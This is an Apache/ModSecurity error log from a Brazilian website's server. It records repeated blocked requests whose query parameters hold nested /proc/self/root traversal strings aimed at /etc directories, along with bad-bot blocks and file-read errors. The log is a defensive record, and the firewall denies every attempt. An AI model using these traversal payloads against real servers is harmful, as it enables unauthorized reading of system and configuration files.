[Wed Mar 18 12:16:52.858481 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:50340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB5Mdf6f5d65gmYZTkoAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:16:54.287155 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:58314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB5ta6ubjKNq_cu4arxQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:16:56.494308 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:47612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB6NY0UrI5A3LftIzAOQAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:56.648349 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:58316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB6CmAPhZkrhU8w4l9ZgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:16:57.818986 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:47628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB6eyqAr6etmhZHNrTxQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:17:05.315915 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:47642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB8cdf6f5d65gmYZTkqQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:17:23.672577 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:56272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCA-oXxyEfFpUF8f99NAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:17:32.791249 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:39682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCDAkwaGbbGflqUZAgKQAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:17:44.819311 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:35620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCGOoXxyEfFpUF8f99QgAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:18:04.910413 2026] [mime_magic:error] [pid 11816:tid 140411548894976] (70014)End of file found: [client 57.141.18.42:44368] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:18:39.648643 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:59484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCT0zinOy1jxa1j4cmDwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:18:43.595702 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:33528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCU-yqAr6etmhZHNrUEwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:18:54.917077 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.228.61:39394] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrCXta6ubjKNq_cu4asFwAAA08"]
[Wed Mar 18 12:18:56.903419 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.244.43:35314] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrCYOw_le52K8_3pV3vQQAAAgY"]
[Wed Mar 18 12:18:59.707156 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:33540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrCY-yqAr6etmhZHNrUJAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:19:56.592289 2026] [mime_magic:error] [pid 17653:tid 140411540502272] (70014)End of file found: [client 57.141.18.45:47708] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:20:47.858142 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 57.141.18.15:49224] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:22:18.705316 2026] [mime_magic:error] [pid 31803:tid 140411658000128] (70014)End of file found: [client 57.141.18.80:52022] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:22:22.654535 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.241.31:35798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDLuw_le52K8_3pV3v4AAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:22:38.231669 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:42766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDPkzinOy1jxa1j4cmuAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:22:58.714655 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:37626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDUfu8EFLIOrSqIpsUOgAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:23:27.511210 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:46130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDbymAPhZkrhU8w4l-QwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:23:58.136624 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.228.61:52548] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrDjcdf6f5d65gmYZTmEgAAAtE"]
[Wed Mar 18 12:23:58.136747 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.244.43:37264] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrDjcdf6f5d65gmYZTmFAAAAsM"]
[Wed Mar 18 12:24:09.550577 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:58458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDmeoXxyEfFpUF8f9-OQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:24:13.607485 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:49546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrDndY0UrI5A3LftIzCTgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:25:56.832494 2026] [mime_magic:error] [pid 26799:tid 140411691570944] (70014)End of file found: [client 57.141.18.115:58840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:27:02.910486 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 57.141.18.66:60896] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:27:29.579071 2026] [:error] [pid 17653:tid 140411582465792] [client 216.73.216.191:61067] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEYcdf6f5d65gmYZTmgAAAAtM"]
[Wed Mar 18 12:27:44.120573 2026] [:error] [pid 26799:tid 140411540502272] [client 216.73.216.191:38655] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrEcNa6ubjKNq_cu4atrAAAA1g"]
